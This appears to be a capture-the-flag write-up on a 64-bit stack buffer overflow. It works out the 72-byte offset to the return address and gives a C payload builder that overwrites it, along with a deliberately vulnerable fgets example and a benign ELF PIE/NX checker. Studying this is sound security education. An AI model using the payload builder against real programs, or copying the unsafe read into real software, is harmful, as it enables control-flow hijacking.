Here's what it looks like when running the binary:

The buffer overflow happens when answering the second question.

If we decompile the binary with Ghidra, we can see the function that main() calls when the program starts.

After the snowman() function finishes, another function named investigate() is called.

The variable's buffer is 64 bytes long.

This is a 64-bit executable, so to reach the return address we have to write past the 64-byte buffer and then overwrite 8 more bytes for the saved frame pointer (RBP on x86-64, not EBP). The return address therefore starts at offset 64 + 8 = 72 from the beginning of the buffer.
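
To make the layout concrete, here is an added example in C (not the challenge's code or the original writeup's): a constructed stand-in for the vulnerable read, plus a small builder that emits the 72 bytes of filler followed by a little-endian return address. The 64-byte buffer and the 8-byte saved RBP come from the writeup; the target address (0x401234 in the usage line) is a placeholder, and the function name `vulnerable_prompt` and the `fgets` size are assumptions about how the binary reads input.

```c
/* Stack layout for the writeup's vulnerable function and a payload builder
 * for it. Added example, not the challenge's own code: the 64-byte buffer
 * and the x86-64 saved-RBP slot are from the writeup; the target address
 * is whatever the caller passes in (the writeup does not name one). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE       64  /* size of the local buffer, from the decompilation */
#define SAVED_RBP_SIZE  8  /* x86-64: the saved frame pointer sits right above the buffer */

/* Models the bug: a 64-byte stack buffer filled by a read that accepts more
 * than 64 bytes. Constructed stand-in for the "second question" handler
 * (assumed to use fgets with an oversized length); never called below. */
void vulnerable_prompt(void)
{
    char answer[BUF_SIZE];
    fgets(answer, 256, stdin);   /* 256 > sizeof answer: overwrites saved RBP, then the return address */
    printf("You said: %s\n", answer);
}

/* Offset from the start of the buffer to the saved return address. */
size_t return_address_offset(size_t buf_size)
{
    return buf_size + SAVED_RBP_SIZE;   /* 64 + 8 = 72 for this binary */
}

/* Writes filler up to the return address, then the target address as an
 * 8-byte little-endian value. Returns the payload length, or 0 if out is too small. */
size_t build_payload(uint64_t target, unsigned char *out, size_t out_len)
{
    size_t ret_off = return_address_offset(BUF_SIZE);
    size_t total = ret_off + sizeof target;
    if (out_len < total)
        return 0;
    memset(out, 'A', BUF_SIZE);                     /* fills the 64-byte buffer */
    memset(out + BUF_SIZE, 'B', SAVED_RBP_SIZE);    /* clobbers saved RBP; its value does not matter here */
    for (size_t i = 0; i < sizeof target; i++)      /* little-endian, independent of host byte order */
        out[ret_off + i] = (unsigned char)(target >> (8 * i));
    /* Non-PIE text addresses such as 0x0000000000401234 end in NUL bytes;
     * that is harmless because they are the last bytes of the payload. */
    return total;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <hex return address>, e.g. %s 0x401234 | ./chall\n", argv[0], argv[0]);
        return 1;
    }
    uint64_t target = strtoull(argv[1], NULL, 16);   /* placeholder address; take the real one from Ghidra */
    unsigned char payload[BUF_SIZE + SAVED_RBP_SIZE + sizeof target];
    size_t n = build_payload(target, payload, sizeof payload);
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

Compile with `gcc -o build_payload build_payload.c`, then pipe its output to the challenge after the answer to the first question, for example `(echo first; ./build_payload 0x401234) | ./chall` (both `first` and the address are placeholders). Because the address is written little-endian, the zero high bytes of a non-PIE address land at the very end of the payload, so even an input routine that stops at the first NUL would already have copied everything that matters.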

If we check the binary with checksec, we see that NX is enabled, so we can't simply put shellcode on the stack and jump to it. But PIE is disabled, so the program's code addresses are fixed and we can read the real addresses straight out of the binary (for example in Ghidra) without needing a leak.
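
As an added example, not part of the original writeup, here is a minimal checksec in C that reports the two properties used above: PIE from the ELF header's `e_type` (ET_EXEC means fixed addresses, ET_DYN means position independent) and NX from the `PT_GNU_STACK` program header (present without PF_X means a non-executable stack; absent means the kernel falls back to an executable stack on x86-64, which checksec and pwntools both report as NX disabled). `build_sample_elf` is a constructed, header-only image for trying the parser offline; `main` takes the path of a real binary.

```c
/* Minimal checksec for PIE and NX on ELF64 images. Added example, not part
 * of the writeup. inspect_elf() works on an in-memory image; main() loads
 * the start of a file from disk. */
#include <elf.h>
#include <stdio.h>
#include <string.h>

struct elf_props {
    int valid;  /* 1 if the image is a 64-bit ELF with a sane program header table */
    int pie;    /* 1 if ET_DYN (position independent), 0 if ET_EXEC (fixed addresses) */
    int nx;     /* 1 if a PT_GNU_STACK header is present and lacks PF_X */
};

struct elf_props inspect_elf(const unsigned char *img, size_t len)
{
    struct elf_props p = {0, 0, 0};
    Elf64_Ehdr eh;
    if (len < sizeof eh)
        return p;
    memcpy(&eh, img, sizeof eh);                /* memcpy avoids alignment assumptions */
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 || eh.e_ident[EI_CLASS] != ELFCLASS64)
        return p;
    if (eh.e_phentsize != sizeof(Elf64_Phdr))
        return p;
    /* Bounds-check the program header table before walking it. */
    if (eh.e_phoff > len || (size_t)eh.e_phnum * sizeof(Elf64_Phdr) > len - eh.e_phoff)
        return p;
    p.valid = 1;
    p.pie = (eh.e_type == ET_DYN);
    /* Like checksec/pwntools: no PT_GNU_STACK at all means an executable
     * stack by default on x86-64, so nx stays 0 unless the header is found. */
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        memcpy(&ph, img + eh.e_phoff + (size_t)i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_GNU_STACK) {
            p.nx = !(ph.p_flags & PF_X);
            break;
        }
    }
    return p;
}

/* Constructed sample: an ELF64 header plus one PT_GNU_STACK program header,
 * enough for inspect_elf() but not a loadable binary. Returns bytes written. */
size_t build_sample_elf(unsigned char *out, size_t out_len, int pie, int exec_stack)
{
    Elf64_Ehdr eh;
    Elf64_Phdr ph;
    size_t total = sizeof eh + sizeof ph;
    if (out_len < total)
        return 0;
    memset(&eh, 0, sizeof eh);
    memset(&ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = pie ? ET_DYN : ET_EXEC;
    eh.e_machine = EM_X86_64;
    eh.e_version = EV_CURRENT;
    eh.e_phoff = sizeof eh;                     /* program headers follow the ELF header directly */
    eh.e_ehsize = sizeof eh;
    eh.e_phentsize = sizeof ph;
    eh.e_phnum = 1;
    ph.p_type = PT_GNU_STACK;
    ph.p_flags = PF_R | PF_W | (exec_stack ? PF_X : 0);
    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, &ph, sizeof ph);
    return total;
}

int main(int argc, char **argv)
{
    static unsigned char img[65536];            /* the first 64 KiB covers the program header table of ordinary binaries */
    if (argc != 2) {
        fprintf(stderr, "usage: %s <elf file>\n", argv[0]);
        return 1;
    }
    FILE *f = fopen(argv[1], "rb");
    if (!f) {
        perror("fopen");
        return 1;
    }
    size_t len = fread(img, 1, sizeof img, f);
    fclose(f);
    struct elf_props p = inspect_elf(img, len);
    if (!p.valid) {
        fprintf(stderr, "not a parseable ELF64 file\n");
        return 1;
    }
    printf("PIE: %s\nNX:  %s\n", p.pie ? "enabled" : "disabled", p.nx ? "enabled" : "disabled");
    return 0;
}
```

Run it as `./minicheck ./chall`; on the writeup's binary it should print NX enabled and PIE disabled. The parser deliberately reads the ELF structures with memcpy and bounds-checks `e_phoff`/`e_phnum` before walking the table, since a tool that parses untrusted binaries is itself a target.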